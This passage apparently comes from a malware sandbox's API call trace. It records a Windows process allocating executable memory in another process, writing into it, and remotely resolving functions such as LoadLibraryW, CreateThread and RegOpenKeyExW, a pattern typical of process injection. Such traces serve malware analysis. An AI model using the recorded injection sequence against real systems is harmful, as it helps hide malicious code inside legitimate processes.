out: lpBuffer=0x32adad7a*, lpNumberOfBytesWritten=0xcdac8*=0xc) returned 1 [0189.906] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.907] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf9c0 [0189.907] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.907] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf9c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf9c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.907] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.907] ResetEvent (hEvent=0x640) returned 1 [0189.908] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.908] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.908] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.910] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf9c0 | out: hHeap=0x2150000) returned 1 [0189.910] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.910] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.912] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.912] lstrlenA (lpString="lstrcmpiA") returned 9 [0189.912] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.912] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adad90*, nSize=0xa, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adad90*, lpNumberOfBytesWritten=0xcdac8*=0xa) returned 1 [0189.913] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.913] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa50 [0189.913] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.913] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acfa50*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acfa50*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.913] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.914] ResetEvent (hEvent=0x640) returned 1 [0189.914] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.914] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.914] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.914] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfa50 | out: hHeap=0x2150000) returned 1 [0189.914] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.915] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.915] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.915] lstrlenA (lpString="CloseHandle") returned 11 [0189.915] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.915] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adadfa*, nSize=0xc, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adadfa*, lpNumberOfBytesWritten=0xcdac8*=0xc) returned 1 [0189.915] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.915] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa50 [0189.915] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.916] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acfa50*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acfa50*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.916] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.917] ResetEvent (hEvent=0x640) returned 1 [0189.917] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.917] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.917] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.917] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfa50 | out: hHeap=0x2150000) returned 1 [0189.917] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.917] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.918] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.918] lstrlenA (lpString="GetTickCount") returned 12 [0189.918] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.918] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adadea*, nSize=0xd, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adadea*, lpNumberOfBytesWritten=0xcdac8*=0xd) returned 1 [0189.918] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.918] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa50 [0189.918] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.919] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acfa50*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acfa50*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.919] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.919] ResetEvent (hEvent=0x640) returned 1 [0189.919] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.919] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.920] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.920] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfa50 | out: hHeap=0x2150000) returned 1 [0189.920] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.920] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.920] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.920] lstrlenA (lpString="MultiByteToWideChar") returned 19 [0189.920] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.920] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adadd4*, nSize=0x14, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adadd4*, lpNumberOfBytesWritten=0xcdac8*=0x14) returned 1 [0189.921] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.921] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0189.921] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.921] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.921] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.922] ResetEvent (hEvent=0x640) returned 1 [0189.922] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.922] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.922] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.922] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0189.922] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.922] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.926] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.926] lstrlenA (lpString="InitializeCriticalSectionAndSpinCount") returned 37 [0189.926] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x26, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.927] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adadac*, nSize=0x26, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adadac*, lpNumberOfBytesWritten=0xcdac8*=0x26) returned 1 [0189.927] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.927] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0189.927] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.927] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.928] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.928] ResetEvent (hEvent=0x640) returned 1 [0189.928] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.929] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.929] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.929] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0189.929] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.930] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.931] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.931] lstrlenA (lpString="CreateThread") returned 12 [0189.931] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.931] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adad9c*, nSize=0xd, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adad9c*, lpNumberOfBytesWritten=0xcdac8*=0xd) returned 1 [0189.931] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.931] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf510 [0189.931] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.932] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf510*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf510*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.932] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.932] ResetEvent (hEvent=0x640) returned 1 [0189.932] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.932] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.933] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.933] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf510 | out: hHeap=0x2150000) returned 1 [0189.933] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.933] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.933] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0189.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adaf8a, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0189.933] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfae0 [0189.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adaf8a, cbMultiByte=-1, lpWideCharStr=0x32acfae0, cchWideChar=11 | out: lpWideCharStr="USER32.dll") returned 11 [0189.933] lstrlenW (lpString="USER32.dll") returned 10 [0189.933] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.933] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acfae0*, nSize=0x16, lpNumberOfBytesWritten=0xcdad8 | out: lpBuffer=0x32acfae0*, lpNumberOfBytesWritten=0xcdad8*=0x16) returned 1 [0189.934] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0189.934] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0189.934] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.934] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x18, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9e8*=0x18) returned 1 [0189.935] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesWritten=0xcd9e8*=0xd8) returned 1 [0189.935] ResetEvent (hEvent=0x640) returned 1 [0189.935] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.952] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0189.952] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.952] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0189.952] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.952] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfae0 | out: hHeap=0x2150000) returned 1 [0189.952] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.953] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.953] lstrlenA (lpString="wsprintfA") returned 9 [0189.953] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.953] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaf74*, nSize=0xa, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaf74*, lpNumberOfBytesWritten=0xcdac8*=0xa) returned 1 [0189.953] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.953] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfb40 [0189.953] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.954] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acfb40*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acfb40*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.954] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.954] ResetEvent (hEvent=0x640) returned 1 [0189.954] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.955] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.955] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.955] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfb40 | out: hHeap=0x2150000) returned 1 [0189.955] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.955] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.955] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.955] lstrlenA (lpString="wsprintfW") returned 9 [0189.955] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.956] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaf80*, nSize=0xa, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaf80*, lpNumberOfBytesWritten=0xcdac8*=0xa) returned 1 [0189.956] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.956] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.956] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.956] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.957] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.957] ResetEvent (hEvent=0x640) returned 1 [0189.957] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.957] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.957] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.958] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.958] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.958] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.958] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0189.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adafe8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0189.960] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa50 [0189.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adafe8, cbMultiByte=-1, lpWideCharStr=0x32acfa50, cchWideChar=13 | out: lpWideCharStr="ADVAPI32.dll") returned 13 [0189.960] lstrlenW (lpString="ADVAPI32.dll") returned 12 [0189.960] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.960] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acfa50*, nSize=0x1a, lpNumberOfBytesWritten=0xcdad8 | out: lpBuffer=0x32acfa50*, lpNumberOfBytesWritten=0xcdad8*=0x1a) returned 1 [0189.960] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0189.961] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0189.961] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.961] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x18, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9e8*=0x18) returned 1 [0189.961] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesWritten=0xcd9e8*=0xd8) returned 1 [0189.962] ResetEvent (hEvent=0x640) returned 1 [0189.962] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.967] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0189.967] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.967] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0189.967] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.967] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfa50 | out: hHeap=0x2150000) returned 1 [0189.967] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.968] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.968] lstrlenA (lpString="RegOpenKeyExW") returned 13 [0189.968] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.968] 